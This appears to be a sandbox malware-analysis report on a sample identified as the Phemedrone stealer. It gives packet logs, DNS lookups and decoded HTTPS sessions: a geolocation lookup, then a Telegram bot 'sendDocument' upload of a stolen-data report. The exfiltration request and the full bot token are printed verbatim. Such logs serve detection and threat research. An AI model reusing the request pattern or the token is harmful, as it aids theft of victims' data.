                                                                                          Dec 17, 2024 09:45:10.627171993 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:10.627186060 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.062150955 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.062249899 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.065061092 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.065071106 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.065526962 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.066780090 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.107353926 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.434406996 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.434439898 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.438142061 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.438163996 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.438322067 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.438623905 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.442152023 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.442172050 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445123911 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445135117 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445151091 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445156097 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445264101 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445271969 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445291042 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445332050 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445408106 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445416927 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445425987 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445434093 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445441961 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445447922 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445488930 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445501089 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445543051 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445554018 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445566893 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445585966 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445589066 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445678949 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445697069 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445712090 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445724964 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445735931 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445741892 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445761919 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445771933 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445830107 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445837975 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445858002 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445869923 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445874929 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445972919 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445981026 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.445991993 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.445997000 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446052074 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446064949 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446108103 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446115017 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446141005 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446146965 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446151972 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446255922 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446263075 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446278095 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446285963 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446341991 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446348906 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446367025 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446372986 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.446387053 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.446398020 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.456805944 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.456880093 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.456892967 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.456969976 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.456979990 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.456988096 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.456993103 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457005978 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457011938 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457051039 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457057953 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457106113 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457113028 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457148075 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457184076 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457190037 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457228899 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457235098 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457282066 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457289934 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457295895 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457299948 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457319021 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457324028 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.457331896 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457346916 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457436085 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457463026 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457499027 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457540989 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457550049 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.457571983 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:12.499341011 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.669181108 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:12.714729071 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:14.225159883 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:14.227180004 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:14.227344990 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:14.234355927 CET49708443192.168.2.7149.154.167.220

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 17, 2024 09:45:02.472817898 CET5475153192.168.2.71.1.1.1
                                                                                          Dec 17, 2024 09:45:02.612515926 CET53547511.1.1.1192.168.2.7
                                                                                          Dec 17, 2024 09:45:10.487593889 CET5492253192.168.2.71.1.1.1
                                                                                          Dec 17, 2024 09:45:10.625349045 CET53549221.1.1.1192.168.2.7

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 17, 2024 09:45:02.472817898 CET192.168.2.71.1.1.10xbba8Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:10.487593889 CET192.168.2.71.1.1.10xdbfeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 17, 2024 09:45:02.612515926 CET1.1.1.1192.168.2.70xbba8No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:02.612515926 CET1.1.1.1192.168.2.70xbba8No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:02.612515926 CET1.1.1.1192.168.2.70xbba8No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                                          Dec 17, 2024 09:45:10.625349045 CET1.1.1.1192.168.2.70xdbfeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • get.geojs.io
                                                                                          • api.telegram.org

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.749701104.26.0.1004435200C:\Users\user\Desktop\Ls4O6Pmixd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-17 08:45:03 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                                          Host: get.geojs.io
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-17 08:45:04 UTC1124INHTTP/1.1 200 OK
                                                                                          Date: Tue, 17 Dec 2024 08:45:04 GMT
                                                                                          Content-Type: application/json
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          x-request-id: 0bb1ce4b38437b8b490938ce0efeb21f-ASH
                                                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          pragma: no-cache
                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          geojs-backend: ash-01
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaFIgdN%2B%2Bzd6DqHz8FetNAc2rUcPxkeNig200aRYRGf1wEvjYBd%2FhVMYLZuUmnJdT1yuzCGmXj1Oel2xVehFnzKVmuR3frMCqaOVhnXLAF%2F2hSvne2ldH7k9auLiPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8f35a284eb6142bc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1605&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1819314&cwnd=225&unsent_bytes=0&cid=da96e56bde2584ec&ts=464&x=0"
                                                                                          2024-12-17 08:45:04 UTC245INData Raw: 31 34 36 0d 0a 7b 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 31 34 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e
                                                                                          Data Ascii: 146{"longitude":"-74.0014","accuracy":20,"timezone":"America\/New_York","city":"New York","organization":"AS3356 LEVEL3","asn":3356,"ip":"8.46.123.189","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","con
                                                                                          2024-12-17 08:45:04 UTC88INData Raw: 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 35 30 33 22 7d 0a 0d 0a
                                                                                          Data Ascii: tinent_code":"NA","country":"United States","region":"New York","latitude":"40.7503"}
                                                                                          2024-12-17 08:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.749708149.154.167.2204435200C:\Users\user\Desktop\Ls4O6Pmixd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-17 08:45:12 UTC384OUTPOST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                          Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457
                                                                                          Host: api.telegram.org
                                                                                          Content-Length: 733555
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 65 34 64 33 34 31 37 36 34 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 92 a2 c1 63 de c9 95 bc 4c a4 7a bb bf dd bf f4 07 fe 44 60 75 83 29 aa f9 d0 09 6b 36 44 21 1e 0d 60 13 c3 85 b3 5c 67 6c 0b 02 45 e3 1e c5 e3 64 1e 0b f5 bd e9 28 33 8d c2 02 af 92 ae f2 2a 80
                                                                                          Data Ascii: ------------------------------8dd1e4d34176457Content-Disposition: form-data; name="document"; filename="[US]8.46.123.189-Phemedrone-Report.phem"Content-Type: application/octet-streamcLzD`u)k6D!`\glEd(3*
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 00 cd 72 be 24 d5 46 44 f7 d8 c9 af 2d 4b 03 9d ca ce f3 8e 8a 49 e9 05 1c 05 9f 39 16 fd af a8 19 d4 71 9d 8d 14 b1 90 b3 9f f2 03 46 3b b9 b8 91 40 f6 47 4d 0c 19 a0 04 28 43 29 58 37 35 ac 62 31 87 67 3a 88 5b dd 6b df f1 be 00 f5 87 0f 7b 64 10 dd ec ad 75 88 5b cd 3f 29 ba 3e 35 f0 cf 6c 22 b3 c3 26 d0 da 29 07 bc 84 72 a8 f8 cf 7b ce cf 81 be 37 14 f1 9b 8e 2c 0c 8b 4a 90 92 e7 fc c3 77 56 91 cc b4 a9 f1 36 c2 49 d9 05 97 96 41 55 d4 df 66 3d 6c ff d4 5f 50 c5 8e 0c 91 7e 9d d1 1a 60 9e 69 c7 21 04 a5 79 a7 c1 f7 7d df 34 66 f0 ab 19 43 6f 58 46 41 e6 be bf 59 4a 85 82 c9 89 ad fc b0 e0 43 8f b4 e5 02 6d 9e b2 24 8b e3 a5 37 e3 26 a8 c0 12 51 01 d9 f2 11 ad 6a 97 89 f2 42 91 19 c0 ed bf 63 bc 8c 26 ef 11 00 1f 5b eb 65 ec e0 ac cf 3c d3 79 c5 4e 5b
                                                                                          Data Ascii: r$FD-KI9qF;@GM(C)X75b1g:[k{du[?)>5l"&)r{7,JwV6IAUf=l_P~`i!y}4fCoXFAYJCm$7&QjBc&[e<yN[
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 8b fa 27 84 af 34 42 64 06 8c a9 82 5c 0c 9a 32 0c b3 fc 93 9e aa d6 8b e2 57 d1 28 64 a2 62 d5 f6 18 f6 57 65 5a 02 4d 69 a6 82 cd be d0 93 de 2e 56 76 e7 e6 9b cb 20 24 97 83 32 dd 70 64 aa 77 67 36 aa 52 ad c0 63 26 a9 b2 5f 15 90 5e 07 e6 01 e3 16 f1 21 01 60 e4 a6 a6 55 c1 cd c9 1c 46 2c 42 85 a0 2d f6 87 93 7c 6a 10 21 ce 91 4c 8c 63 98 f4 3c 27 aa c5 ab 59 22 14 67 1f 6c 94 c4 72 ec c7 82 3a a0 11 ac 5c c4 5e 4d 67 2d e3 af 59 13 8d 52 31 de 72 6d c5 1a dc 89 a6 6f 9e b3 fe 08 0f 86 c4 6a 15 20 42 48 ea 56 76 27 f2 65 d3 19 0a 57 07 44 76 c0 9a 83 38 06 d2 80 c0 d9 99 dc b0 93 bd 62 21 4e 88 1f 84 74 29 52 39 32 32 54 5c 0f 32 64 71 9e 2b 65 d5 a6 69 7f c7 a1 76 df 16 c1 16 b6 4a fc b4 f0 27 6f 13 9f 9a e2 f5 08 58 50 f6 11 75 c1 ac dc 8e ed f2 72
                                                                                          Data Ascii: '4Bd\2W(dbWeZMi.Vv $2pdwg6Rc&_^!`UF,B-|j!Lc<'Y"glr:\^Mg-YR1rmoj BHVv'eWDv8b!Nt)R922T\2dq+eivJ'oXPur
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 09 e1 78 28 20 88 a4 18 b6 b8 1c d4 e6 29 b8 4b 1c 62 51 23 a5 47 3d 0b 65 b1 e0 e5 e7 d4 77 0d b2 d8 34 45 33 cc 80 10 35 c4 a6 01 d0 60 9b 89 68 e5 cb 03 64 60 de 00 a5 d0 d5 43 59 e1 4c 38 8d c3 44 cd 00 e0 1b 7b d9 60 43 9e f3 41 e5 3d a9 dd bc 36 fd 86 10 fa 4d 6b d9 6e 3d ec 1c e1 b5 3b 82 3b 61 26 b3 74 be 31 a2 36 f6 43 24 03 28 65 73 80 52 3a 78 a9 47 0c 98 c4 fb 30 cd ab 0a 70 8b d8 ad e6 6e 74 3a 17 19 de ab 46 a9 4b 78 40 c9 98 7e dc f8 02 fd 2a b9 9f 70 24 21 0f 23 b7 8c 8a 4a 5b 9e 83 77 86 1b 15 6b 96 db 7f 47 9c 7f fc 89 7f 4d 10 31 16 d1 6a 2d 7d 82 96 74 17 ae 98 54 e5 63 52 f3 cb df 09 f5 c9 75 1d 04 10 8e 6b f2 05 f9 71 e5 90 43 4f b1 23 42 57 1c ff 77 21 f7 65 d4 c2 b4 69 12 21 b3 b9 0b 64 33 b0 37 44 51 1c 6b 22 98 b1 d4 59 15 2f 15
                                                                                          Data Ascii: x( )KbQ#G=ew4E35`hd`CYL8D{`CA=6Mkn=;;a&t16C$(esR:xG0pnt:FKx@~*p$!#J[wkGM1j-}tTcRukqCO#BWw!ei!d37DQk"Y/
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 2e 91 fe 6f c0 a7 13 a3 b1 72 c3 57 25 95 25 6e db c7 cb 11 12 4d 7d b1 1d b2 de d1 88 db eb 7d f1 b6 ff 39 ab 3f 62 c3 b8 bc ed cb 0c 37 08 c0 e0 42 2c b3 36 09 2b 87 3b f1 cc e9 b7 b9 ad 9d 69 b0 52 1b d6 36 39 ec fb 11 6f 1e f3 d0 ad cb 54 5c ee 8f ee 56 7e 6d 8c 4c 1c 36 fb cb 1f 5a db e4 a7 a4 93 e6 8a 57 11 05 8c 2c 71 88 a0 e6 b6 86 c6 23 1f eb 85 1f d7 92 87 98 97 f7 19 4a 23 5b 68 9a 13 7b 64 12 9a bd 96 aa bc d3 3b 0c bf ea 6b 44 50 db 09 61 03 f6 c0 fb 23 09 5c 90 f5 63 f9 4c 6f 26 d2 d5 49 82 6a 8e 78 86 e8 18 5f 22 51 34 dd 74 c6 71 c3 6f 11 f4 16 86 40 15 c8 8e 1f 66 a1 95 04 62 e0 22 12 c8 27 d0 be ae 83 b6 20 1a 24 92 6a 28 7a 08 c0 af fe e6 bf 87 2f 86 66 c8 23 6b 4e 8f e4 34 30 43 a6 4e 53 56 a3 58 84 54 e9 21 b9 d2 47 f5 22 65 93 ac 46
                                                                                          Data Ascii: .orW%%nM}}9?b7B,6+;iR69oT\V~mL6ZW,q#J#[h{d;kDPa#\cLo&Ijx_"Q4tqo@fb"' $j(z/f#kN40CNSVXT!G"eF
                                                                                          2024-12-17 08:45:12 UTC145OUTData Raw: cf 3b b1 59 63 db 1c 13 d3 ce 26 d1 2e 4e 91 5c 85 b8 18 53 1f c0 57 5c 4b 28 ef 3a eb 54 84 bd 6b 80 44 f7 7d c1 c1 01 6a 84 c3 6d 5c 43 0a a7 9a 3a 61 8d b4 5a eb bf 95 57 7b 5e 1e 38 9d c7 eb fa bd 7a 76 ef 9a 83 b2 29 d6 a5 9b 25 7e 8f f4 32 04 f2 b6 29 72 25 2b df a2 ff 45 c7 1e 7a 02 2b a2 81 5a 5f 16 4c 8d a1 db cc dc 2e 4f 36 ed b8 b7 87 9f ea 0a ab ca b0 96 15 6d 17 39 94 58 ff 80 ce 24 db c0 7d f7 69 58 d7 52 1f 11 32 32
                                                                                          Data Ascii: ;Yc&.N\SW\K(:TkD}jm\C:aZW{^8zv)%~2)r%+Ez+Z_L.O6m9X$}iXR22
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 1b 56 ad 40 2c 93 e9 aa 9a c3 cb d4 e3 db 64 f7 1b 5e 3e fd 88 b6 ef 18 4e 31 8a 7b 88 5c d9 c6 9b 33 df 48 b4 84 04 5b 65 35 62 5b 22 8c b8 5c 43 8e f8 92 ee 75 eb 9d 2e 64 be ad 8c 89 6b 68 5d f2 be 84 68 69 8b 1e dc bd 20 61 b2 00 60 d5 bf 0e c4 a3 52 3b 7e 1b 4e 50 92 4c 59 b4 e3 fe 61 f0 ae d0 3e 5e 09 6f 0a 2a de 43 32 5e 0b fe bf 6c 72 bb 1b a6 a8 61 f8 b3 9f 3d dd 8f ec e2 70 14 51 49 90 a6 0f b9 44 cb 0c 08 1a 17 8c 97 d1 f8 74 1c 9d c4 80 7e db a3 41 68 63 d9 26 e5 69 ad 85 d5 c4 da 17 ac be 8b 39 8b 73 2c 3e c2 ea 96 99 ea de 5d 07 6a 5b a8 45 77 f9 ad a7 fd 3b b4 52 af 2f 63 eb 96 ef 48 8e fc 41 26 ba d0 65 3e 6f 7f 46 5e 10 21 1e d7 5f ba 42 10 ab 12 6c 91 b2 34 82 99 76 8c a7 cc 0c 2a 57 58 33 f2 9c 34 79 51 2e f3 8d 34 5c 1a 32 0e c9 74 9c
                                                                                          Data Ascii: V@,d^>N1{\3H[e5b["\Cu.dkh]hi a`R;~NPLYa>^o*C2^lra=pQIDt~Ahc&i9s,>]j[Ew;R/cHA&e>oF^!_Bl4v*WX34yQ.4\2t
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 40 73 78 10 05 d4 99 29 4f 9e 00 80 5a 6e 35 02 d1 61 1f 07 23 33 aa 8d bb 9b c4 dd d9 55 2c 1b 8d ea b7 e8 2a 1e 32 ec 5e 50 08 41 0a fd 86 e0 e9 38 45 31 cb dc d3 ba cb e6 01 e7 b0 be 85 35 e5 a6 25 a5 6b b5 01 07 5a 19 1f 32 56 5e 81 ec f5 a8 57 9d d3 bb 72 b5 15 f5 38 b6 4c cb 9e 61 bc 1b 4d 4f 13 38 fc 27 e3 5b fc 84 9b b3 15 19 01 89 50 1e 94 69 3b 39 65 da 0d f1 ca a5 fd e3 82 9a a0 27 c4 39 a3 8c 54 41 f6 ca 92 ae e1 a8 f1 72 42 71 b4 40 04 82 7c 9f 7c 9e 7e 99 96 db d5 7e e2 2d 94 cc 46 1f 78 75 49 23 af 43 e6 5b d0 67 a7 85 cd 17 c7 3f 4a 66 cf b4 31 e1 e6 1f 3a ca c7 db 67 a2 23 dd 03 90 15 92 22 a3 75 86 fe 01 41 b7 78 a7 04 65 23 0a 16 81 40 dd e8 ad bc 2d d7 03 ff 44 48 7d b5 63 11 fd d7 61 00 cd 52 e7 df f6 1e a0 20 ea 30 11 32 46 5f e3 e4
                                                                                          Data Ascii: @sx)OZn5a#3U,*2^PA8E15%kZ2V^Wr8LaMO8'[Pi;9e'9TArBq@||~~-FxuI#C[g?Jf1:g#"uAxe#@-DH}caR 02F_
                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 02 40 28 eb 60 87 6a fd 7f 6c 4d be b2 f0 f9 86 2d 4c 94 28 2e ff 1f 5f 53 2d a0 79 be 86 47 20 3a 26 a5 d9 82 4e 1a 7f 31 d4 8d 2a 2e c0 a4 03 82 ff b4 29 a1 51 79 02 8a 6d cd 18 b1 a2 b3 fe 86 f2 04 9f 40 53 8a ec 91 c4 ca ae 51 ab 9d f1 a1 8b eb f3 0c cb 75 7a 80 aa 41 99 5c 23 88 87 fe 90 b0 cd 13 5f 84 27 39 a0 7a 89 16 9d af 22 4b 16 ef 49 30 f0 91 8a b4 99 47 09 b7 c0 aa 64 6f 68 ee 62 ab d6 cd d8 64 f6 85 92 77 f1 9a 7f a1 96 54 8d 6f 93 eb 23 b4 cd 57 de cd 79 b7 b4 f3 4b 41 44 62 20 57 7c 1d 75 5f d6 17 96 23 50 0c 06 02 ab 0a aa 4c 39 d1 0a 1c 93 67 2c 1a 21 1d e3 ce a3 27 d8 b2 9a b0 55 5d af 6d 95 df 0b bc 9f 98 a7 84 fc be 20 55 38 9c f0 5e 26 ae 9f e8 b9 67 f7 ca e6 60 7a 76 74 0e 23 7e 79 d5 ae f3 1f b1 bd 15 20 c9 e2 dc b9 df 28 12 8b 6d
                                                                                          Data Ascii: @(`jlM-L(._S-yG :&N1*.)Qym@SQuzA\#_'9z"KI0GdohbdwTo#WyKADb W|u_#PL9g,!'U]m U8^&g`zvt#~y (m
